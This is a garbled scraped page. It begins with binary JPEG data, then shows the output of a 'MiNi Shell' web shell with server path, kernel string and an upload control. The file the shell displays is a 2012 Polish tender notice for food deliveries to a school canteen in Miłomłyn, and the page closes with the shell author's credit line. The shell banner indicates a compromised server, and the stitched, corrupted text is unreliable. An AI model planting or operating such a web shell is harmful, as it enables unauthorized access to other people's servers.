JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120118/17054-N-2012.html

<p class="kh_header"><b>Miłomłyn: Dostawa artykułów żywnościowych do stołówki szkolnej</b><br>
<b>Numer ogłoszenia: 17054 - 2012; data zamieszczenia: 18.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczna Szkoła Podstawowa w Miłomłynie im. I Dywizji Tadeusza Kościuszki , ul. Pasłęcka 15, 14-140 Miłomłyn, woj. warmińsko-mazurskie, tel. 0-89 641 31 23, 641 31 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spmilomlyn.edupage.org/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła Podstawowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do stołówki szkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych do stołówki szkolnej na rok 2012.
2. Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 8 do SIWZ stanowiącym integralną część niniejszego SIWZ, w którym wskazano asortyment, charakterystykę, parametry zamawianych artykułów oraz przewidywaną maksymalną ich ilość..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.20.00-2, 15.33.11.70-9, 03.14.25.00-3, 15.50.00.00-3, 15.10.00.00-9, 15.81.00.00-9, 03.22.10.00-6, 03.22.23.00-6, 03.22.21.10-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten zostanie spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. 
Zamawiający uzna, że warunek ten zostanie spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. 
Zamawiający uzna, że warunek ten zostanie spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. 
Zamawiający uzna, że warunek ten zostanie spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. 
Zamawiający uzna, że warunek ten zostanie spełniony, gdy Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie ze wzorem stanowiącym załącznik Nr 1 do SIWZ.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo, jeżeli Wykonawcę reprezentuje pełnomocnik. Pełnomocnictwo powinno być złożone w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza.
2. Formularz oferty sporządzony na podstawie wzoru-zał. nr 6 do SIWZ
3. Wykaz usług, które Wykonawca zamierza powierzyć podwykonawcom-zał.nr 4 do SIWZ
4. Oświadczenie wykonawców wspólnie ubiegających się o przyznanie zamówienia-zał. nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Cena może ulec zmianie tylko w przypadku uzasadnionej konieczności tj. w przypadku wzrostu cen hurtowych artykułów żywnościowych powyżej 5% Wzrost cen wymaga akceptacji zamawiającego wyrażonej na piśmie.
2. Zmiana ceny dostarczanych artykułów żywnościowych może nastąpić przy zmianie podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spmilomlyn.edupage.org/; www.bip.milomlyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczna Szkoła Podstawowa w Miłomłynie, im. I Dywizji Tadeusza Kościuszki
ul. Pasłęcka 15, 14-140 Miłomłyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2012 godzina 08:30, miejsce: Publiczna Szkoła Podstawowa w Miłomłynie, im. I Dywizji Tadeusza Kościuszki
ul. Pasłęcka 15, 14-140 Miłomłyn - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów spożywczych i produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jaja świeże	Duże, 10 szt.	Szt.	7200
2.	Mąka pszenna,Tortowa Płońska typ 450 lub równoważna,1kg	Kg	1000
3.	Cukier,1kg	Kg	400
4.	Sól	Jodowana,1kg	Kg	250
5.	Kasza jęczmienna	Średnia, 0,5 kg	Szt.	40
6.	Makaron świderki	Lubella lub równoważny	0,5 kg	Szt	800
7.	Makaron nitki Lubella lub równoważny	0,4kg	        Szt.	100
8.	Makaron-zacierka Babuni lub równoważny	250g	        Szt.	110
9.	Ryż biały długoziarnisty,1kg	Kg	110
10.	Olej	Kujawski lub równoważny,3l	Szt.	320
11.	Groszek Konserwowy Bonduelle lub równoważny	400g	Szt.	150
12.	Syrop zagęszczony Herbapol lub równoważny, 5l   	Szt.	250
13.	Koncentrat Pomidorowy 30 %	Pudliszki lub równoważny1 kg  	Szt.	60
14.	Ketchup łagodny	Dawton lub równoważny, 500g	Szt.	200
15.	Musztarda sarepska Octim lub równoważna,500g	Szt.	20
16.	Majonez Kętrzyński lub równoważny	815g          	Szt.	50
17.	Magi przyprawa w płynie do zup, sosów, potraw mięsnych i warzywnych Winiary lub równoważny	960g,                                 	Szt.	10
18.	Sok owocowy	Kubuś lub równoważny 0,33 l	Szt.	1200
19.	Filet ShP - ryba mrożona, Mintaj, Luz	                Kg	200
20.	Filet ShP - ryba mrożona, Miruna, Luz	                Kg	200
21.	Chrzan tarty Octim lub równoważny	160g,          	Szt.	90
22.	Pieprz czarny mielony Cykoria lub równoważny 20g	Szt.	100
23.	Truskawka Mrożona 5kg	                                        Szt	30
24.	Fasola Jaś	5kg	                                                Szt	15
25.	Groch	Połówki5kg	                                                Szt	9
26.	Ogórek konserwowy Pomorski	870g	                        Szt	200
27.	Dżemy owocowe wiśnia, truskawka	Łowicz lub równoważny	280 g,  Szt.	150
28.	Drożdże 100g                                                     	Szt.	280
29.	Przyprawa do potraw Vegeta lub równoważny	200g	Szt.	280
30.	Kwasek cytrynowy Emix lub równoważny 20g	        Szt.	100
31.	Ziele angielskie Cykoria lub równoważny 20g	        Szt.	70
32.	Liść laurowy Cykoria lub równoważny 12g	                Szt.	70
33.	Pietruszka suszona Cykoria lub równoważny 10g	        Szt.	100
34.	Cynamon Cykoria lub równoważny 20g	                Szt.	60
35.	Majeranek Cykoria lub równoważny 20g	                Szt.	40
36.	Żurek	Winiary lub równowazny	49g	                        Szt.	600
37.	Kisiel	Cykoria lub równoważny	40g                     	Szt.	1000
38.	Bułka tarta		0,5kg	                                        Szt.	300
39.	Kukurydza Pudliszki lub równoważny 400g	        Szt.	150
40.	Pierogi z truskawkami Mrożone 2,5kg	                Szt.	120
41.	Pierogi z mięsem	Mrożone 2,5 kg	                        Szt.	88
42.	Mieszanka warzywna 7 -składnikowa Mrożona 2,5 kg	Szt	32
43.	Pyzy ziemniaczane Mrożone	5 kg	                        Szt	60
44.	Cukier puder Diamant lub równoważny 0,4 kg	        Szt.	30
45.	Czekolada mleczna Wedel lub równoważny 100 g	Szt.	1200
46.	Czerwona fasola w puszce Pudliszki lub równoważny 400 g	    Szt. 120
47.	Sos sałatkowy Vinegret	Knorr lub równoważny 9 g	 Szt.	400
48.	Ptasie mleczko waniliowe Wedel lub równoważny 420 g	   Szt. 1200
49.	Wafel Grzesiek Goplana lub równoważny	36 g	   Szt. 1200
50.	Śmietanka kremowa 30% UHT 1l	                   Szt. 600
51.	Śmietana 18% BIO lub równoważna	400g	           Szt.	1300
52.	Mleko 2 % karton	Łaciate lub równoważne	1l	   Litr	300
53.	Ser twarogowy Tłusty Kostka	                           Kg	500
54.	Margaryna zwykła		Kostka250 g	          Szt.	200
55.	Masło śmietankowe 82% tłuszczu Kostka200 g.	  Szt.	200
56.	Jogurt owocowy( różne smaki) Jogobella lub równoważny150g	Szt.	3000
57.	Jogurt Polski - różne smaki Mlekovita lub równoważny	250g 	        Szt	700
58.	Serek homogenizowany	Maluta lub równoważny	150g	                Szt	700
59.	Ser żółty Edamski lub równoważny Luz	                                Kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.20.00-2, 15.33.11.70-9, 03.14.25.00-3, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mięsa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MIĘSO				
1.	Karkówka z kości	Luz	Kg	450
2.	Schab z kością Luz	Kg	250
3.	Łopatka z kością Luz	Kg	840
4.	Pachwina bez skóry Luz	Kg	600
5.	Boczek wędzony Luz	Kg	90
6.	Słonina bez skóry	Luz	Kg	120
7.	Kiełbasa biała surowa Morliny lub równoważna Luz	Kg 130
8.	Kiełbasa mazurska  Morliny lub równoważna Luz	        Kg 200
9.	Serdelki wieprzowe pyszne Mazury-Ełk lub równoważne Luz	  Kg 100
10.	Szynka surowa z kością	Luz 	Kg	200
11.	Kości wieprzowe		Luz	Kg	800
12.	Berlinki classic	Morliny lub równoważne	Luz	Kg 230
13.	Udziec wołowy	Luz	Kg	80
	MIĘSO DROBIOWE				
14.	Kotlet drobiowy w kształcie serca Premium, Zawartość mięsa min. 63 %,	paczka 1,08 kg	-  Kg	172,80
15.	Udko z kurczaka - udziec Luz	Kg	220
16.	Udko z kurczaka - podudzie		Luz	Kg	220
17.	Filet z kurczaka		Luz	Kg	800
18.	Korpus z kurczaka		Luz	Kg	150
19.	Wątróbka z kurczaka		Luz	Kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chleb cały 0,5kg	        Szt.	800
2.	Chleb krojony 0,5kg	Szt.	1200
3.	Bułka poznańska 0,80gr.	Szt.	1300
4.	Bułka słodka (z dżemem, z kruszonką, z serem)	0,85gr.	Szt.	800
5. 	Pączek ( z dżemem, z budyniem) 0,80gr.	                        Szt.	800
6.	Bułka kajzerka	0,60gr.	Szt.	1500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ziemniaki Irga lub równoważne 30 kg	Kg	9000
2.	Cebula Luz	                                        Kg	450
3.	Marchew Luz	                                Kg	900
4.	Buraczki czerwone Luz	                        Kg	600
5.	Ogórek kiszony,3kg	                        Szt.	50
6.	Pomidor Luz	                                        Kg	200
7.	Papryka czerwona Luz	                        Kg	100
8.	Kapusta świeża biała Luz	                Kg	750
9.	Kapusta pekińska	Luz	                        Kg	250
10.	Kapusta kiszona	5kg	                       Szt. 	190
11.	Cytryna	Luz	                               Kg	40
12.	Kalafior       Luz	                               Kg	80
13.	Por Luz	                                       Kg	200
14.	Seler	Luz	                                       Kg	60
15.	Pietruszka Luz	                               Kg	60
16.	Ogórek zielony Luz	                       Kg	400
17.	Jabłka Cortland lub równoważne Luz	       Kg	900
18.	Jabłka zielone Luz	                              Kg	200
19.	Sałata Luz	                                      Szt	500
20.	Pomarańcze	 Luz	                              Kg	500
21.	Mandarynki	 Luz	                              Kg	200
22.	Banan Luz	                                      Kg	700
23.	Pieczarka Luz                                    Kg	40
24.	Truskawka świeża	Luz	                     Kg	80
25.	Gruszka Luz	                                     Kg	500
26.	Kapusta Czerwona Luz	                     Kg	120
27.	Kapusta włoska Luz                           Kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6, 03.22.21.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com